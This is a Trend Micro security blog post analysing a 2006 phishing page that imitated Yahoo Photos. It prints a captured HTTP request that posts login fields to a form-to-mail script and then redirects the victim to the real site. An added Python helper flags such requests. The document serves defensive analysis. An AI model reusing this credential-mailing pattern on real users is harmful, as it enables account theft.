New Yahoo Phishing site

  • Posted: January 9, 2006
  • Threat category: Uncategorized
  • Author: Virus analyst

Just after I finished reading a story about a hacker who hacked a lot of .gov.ph sites, my previous shiftmate popped me a message on Yahoo Messenger. He asked me if we got new IM Worm samples that use Yahoo Messenger. I told him none, not even a sample from SOBER.AG anniv links, then he immediately popped me the link http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/. He told me that his friend popped him that link. Below is the snapshot of their correspondence in YM:




And below is the screenshot of the Yahoo Phishing site:


Yahoo Phishing Site

Here we are again, reminding Internet users to be cautious about the links they are visiting. As we can see in the image, the site is pretending to be a Yahoo Photo site, but the URL says it is a Geocities link. Always think twice before giving out any usernames and passwords on a website.


I sniffed the packet to find out where the Yahoo account credentials will be sent:

POST /form/mailto.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/?20068
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www2.<BLOCKED>.net
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache

Mail_From=Yahoo&Mail_To=<BLOCKED>.@yahoo.com&Mail_Subject=Yahoo+id&Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=qwerty&passwd=asdf&.save=Sign+In

HTTP/1.1 302 Found
Date: Sun, 08 Jan 2006 00:43:46 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://photos.yahoo.com/ph//my_photos
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

As we can see, the Yahoo credentials are being sent to <BLOCKED>.@yahoo.com
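
The traits visible in this capture (login fields posted to a form-to-mail CGI on one host, with a Next_Page redirect to the real Yahoo Photos page) can be checked for in captured traffic. The following Python is an added example, not code from the original post; the `analyze_post` helper, the extra field names, the host names and the mailbox in the sample are constructed placeholders.

```python
from urllib.parse import parse_qs, urlsplit

CREDENTIAL_FIELDS = {"login", "passwd", "password", "username", "user", "pass"}
# Assumed redirect field names; the capture on this page uses Next_Page.
REDIRECT_FIELDS = {"next_page", "redirect", "return_url"}

def analyze_post(raw: str) -> dict:
    """Parse one captured HTTP request and list signs of form-mailer credential harvesting."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {k: v[0] for k, v in parse_qs(body.strip(), keep_blank_values=True).items()}
    host = headers.get("host", "").lower()
    findings = []
    creds = sorted(k for k in fields if k.lower() in CREDENTIAL_FIELDS)
    if method == "POST" and creds:
        findings.append("credential fields posted: " + ", ".join(creds))
    mailer = sorted(k for k in fields if k.lower().startswith("mail_"))
    if mailer:
        findings.append("form-to-mail fields present: " + ", ".join(mailer))
    # The user is sent on to a different site than the one that received
    # the credentials, which hides the fact that anything was collected.
    for key, url in fields.items():
        if key.lower() not in REDIRECT_FIELDS:
            continue
        target = (urlsplit(url).hostname or "").lower()
        if target and target != host:
            findings.append(f"post-submit redirect to {target}, form handled by {host}")
    referer_host = (urlsplit(headers.get("referer", "")).hostname or "").lower()
    if referer_host and referer_host != host:
        findings.append(f"form page on {referer_host} posts to {host}")
    return {"host": host, "path": path, "fields": fields, "findings": findings}

# Constructed sample modelled on the capture above; hosts and mailbox are placeholders.
SAMPLE = (
    "POST /form/mailto.cgi HTTP/1.1\r\n"
    "Referer: http://pages.example.com/x0x_welcome_2006_x0x/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: forms.example.net\r\n"
    "\r\n"
    "Mail_From=Yahoo&Mail_To=collector%40example.org&Mail_Subject=Yahoo+id&"
    "Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=qwerty&passwd=asdf&.save=Sign+In"
)

if __name__ == "__main__":
    for finding in analyze_post(SAMPLE)["findings"]:
        print(finding)
```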

  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.